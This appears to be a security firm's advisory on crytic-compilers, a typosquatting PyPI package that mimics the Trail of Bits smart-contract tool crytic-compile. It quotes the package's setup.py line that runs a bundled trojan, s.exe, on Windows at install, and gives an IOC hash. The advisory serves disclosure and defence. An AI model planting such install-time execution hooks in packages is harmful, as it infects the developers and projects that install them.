Trojan Embedded in crytic-compilers Python Package Targets Popular Blockchain Utility

The Socket Research Team has identified malicious behavior embedded within the Python package crytic-compilers. While the package is named 'crytic-compilers' on the PyPI registry, it's listed as 'crytic-compile' on the corresponding GitHub page. This typosquatting attack, which uses a slight variance in naming convention, can potentially lead to confusion among developers looking to install the legitimate package.

Python Library Name: crytic-compilers

Malicious file: https://socket.dev/pypi/package/crytic-compilers/files/0.3.11/tar-gz/crytic-compilers-0.3.11/setup.py#L10

The malicious package is typosquatting crytic-compile, a popular open source utility to facilitate smart contracts compilation. It is maintained by Trail of Bits’ blockchain security group and the legitimate PyPI package is downloaded approximately 6,000 times per day.

It provides an abstraction layer for smart contract build systems and includes support for a number of popular toolkits and development environments for smart contracts and application building, including Foundry, Hardhat, Dapp, and others.

The plugin is also used in popular Trail of Bits tools, including Slither, Echidna, Manticore, and evm-cfg-builder.

Our analysis has identified 465 repositories that depend on 'crytic-compile,' underlining its significance within the crypto development community.

The malicious crytic-compilers package contains a script that conditionally executes a trojan named s.exe on Windows systems. The executable has been flagged by multiple antivirus engines on VirusTotal, highlighting its malicious nature.

Technical Analysis#

The crytic-compilers package is purportedly designed to help with the compilation of smart contracts, as stated in its description: "Util to facilitate smart contracts compilation." However, closer inspection reveals that it also attempts to download crytic-compile from its GitHub repository while executing a malicious payload on Windows systems.

The malicious code segment of the script in setup.py is as follows:

exec("s.run(os.path.abspath('s.exe'), check=1)" if sys.platform == 'win32' else "pass")

Here’s a detailed breakdown of the script's behavior:

Operating System Check: The script first checks the platform using sys.platform == 'win32'. This condition evaluates whether the script is running on a Windows system.

Conditional Execution: If the condition is true (indicating a Windows environment), the script executes s.run(os.path.abspath('s.exe'), check=1). If the condition is false (indicating a non-Windows environment), the script executes pass, effectively doing nothing.

The command s.run(os.path.abspath('s.exe'), check=1) functions as follows:

It generates the full path to the s.exe file, ensuring it is correctly located regardless of the current working directory.

Discovery and Implications#

The ‘s.exe’ file comes bundled with the Python tar file for the crytic-compilers package. Upon performing passive analysis by uploading the malicious file to VirusTotal, we discovered that it is flagged as a trojan. Here are the details of the file's detection:

VirusTotal Analysis: VirusTotal report for s.exe

Typosquatting attacks like this, where attackers create packages with names similar to legitimate ones, can easily deceive developers and lead to serious security breaches. This case is just one example of the many low-effort attempts at distributing malware through open source package registries.

The malicious package in question, downloaded 388 times before its removal, demonstrates the importance of continuous monitoring and vetting of packages to protect the integrity of the software supply chain. Socket makes that easy by flagging both vulnerable and malicious packages directly in the PR workflow before you install them. Install our free Socket for GitHub app in two clicks to secure your dependencies.

IOC:

Name: s.exe

Hash: b09ef792135fd0896ce7eb57638ea9199f1ae37f4a374398198a54bd84e2a5a2

Socket Research Team

• Dhanesh Dodia
• Sambarathi Sai
• Viren Saroha